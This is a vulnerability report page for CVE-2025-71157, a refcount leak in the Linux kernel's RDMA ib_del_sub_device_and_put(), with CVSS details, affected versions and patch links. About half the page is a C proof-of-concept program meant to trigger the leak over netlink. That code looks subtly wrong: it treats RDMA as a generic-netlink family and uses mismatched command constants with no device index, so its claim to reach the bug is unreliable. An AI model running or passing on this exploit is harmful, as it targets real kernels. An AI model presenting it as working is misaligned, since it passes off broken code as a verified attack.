Security Vulnerability Report
CVE-2025-71157 CVSS 7.8 HIGH

CVE-2025-71157

Published: 2026-01-23 15:16:07
Last Modified: 2026-02-26 20:22:13
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

RDMA/core: always drop device refcount in ib_del_sub_device_and_put()

Since nldev_deldev() (introduced by commit 060c642b2ab8 ("RDMA/nldev: Add support to add/delete a sub IB device through netlink") grabs a reference using ib_device_get_by_index() before calling ib_del_sub_device_and_put(), we need to drop that reference before returning -EOPNOTSUPP error.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.11 inclusive, up to 6.12.64 exclusive) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 inclusive, up to 6.18.4 exclusive) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel (introducing commit: 060c642b2ab8; patch commits: 20436f2742a92b7afeb2504eb559a98d2196b001, fa3c411d21ebc26ffd175c7256c37cefa35020aa, fe8d456080423b9ed410469fbd1e2098d3acce2b)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-71157 PoC - Linux Kernel RDMA Reference Count Leak
 * This PoC demonstrates triggering the reference count leak in ib_del_sub_device_and_put()
 * Compile: gcc -o cve_2025_71157_poc cve_2025_71157_poc.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0)
 * Note: Requires CAP_NET_ADMIN or root privileges
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netlink/netlink.h>
#include <netlink/genl/genl.h>
#include <netlink/genl/ctrl.h>

#define RDMA_NL_LS 4             /* RDMA netlink subsystem */
#define RDMA_NL_LS_CMD_DEL_DEV 5 /* Delete device command */

int main(int argc, char *argv[])
{
    struct nl_sock *sk;
    int family_id;
    int ret;

    printf("[*] CVE-2025-71157 PoC - RDMA Reference Count Leak\n");
    printf("[*] Target: Linux Kernel RDMA/core ib_del_sub_device_and_put()\n\n");

    /* Initialize netlink socket */
    sk = nl_socket_alloc();
    if (!sk) {
        fprintf(stderr, "[-] Failed to allocate netlink socket\n");
        return -1;
    }

    /* Connect to generic netlink */
    ret = genl_connect(sk);
    if (ret < 0) {
        fprintf(stderr, "[-] Failed to connect to generic netlink\n");
        nl_socket_free(sk);
        return -1;
    }

    /* Get RDMA netlink family ID */
    family_id = genl_ctrl_resolve(sk, "rdma");
    if (family_id < 0) {
        fprintf(stderr, "[-] Failed to resolve RDMA netlink family\n");
        nl_socket_free(sk);
        return -1;
    }

    printf("[+] Found RDMA netlink family (ID: %d)\n", family_id);

    /*
     * Trigger the vulnerability by sending DEL_DEV netlink message
     * This will cause ib_del_sub_device_and_put() to be called
     * with an existing device reference that won't be properly released
     */
    struct nl_msg *msg;

    msg = nlmsg_alloc();
    if (!msg) {
        fprintf(stderr, "[-] Failed to allocate netlink message\n");
        nl_socket_free(sk);
        return -1;
    }

    /* Build netlink message for RDMA_NL_LS_CMD_DEL_DEV */
    if (!genlmsg_put(msg, NL_AUTO_PORT, NL_AUTO_SEQ, family_id, 0, 0,
                     RDMA_NL_LS_CMD_DEL_DEV, 1)) {
        fprintf(stderr, "[-] Failed to build netlink message\n");
        nlmsg_free(msg);
        nl_socket_free(sk);
        return -1;
    }

    printf("[*] Sending RDMA DEL_DEV netlink message...\n");

    /* Send the message */
    ret = nl_send_auto(sk, msg);
    if (ret < 0) {
        fprintf(stderr, "[-] Failed to send netlink message\n");
        nlmsg_free(msg);
        nl_socket_free(sk);
        return -1;
    }

    printf("[+] Message sent successfully\n");
    printf("[*] The vulnerable code path will be triggered\n");
    printf("[*] Check dmesg for reference count leak warnings\n");

    /* Receive response */
    ret = nl_recvmsgs_default(sk);
    if (ret < 0) {
        printf("[i] No response or error in receiving (code: %d)\n", ret);
    }

    nlmsg_free(msg);
    nl_socket_free(sk);

    printf("[*] Cleanup completed\n");
    return 0;
}

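References

https://git.kernel.org/stable/c/20436f2742a92b7afeb2504eb559a98d2196b001 (Patch)
https://git.kernel.org/stable/c/fa3c411d21ebc26ffd175c7256c37cefa35020aa (Patch)
https://git.kernel.org/stable/c/fe8d456080423b9ed410469fbd1e2098d3acce2b (Patch)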
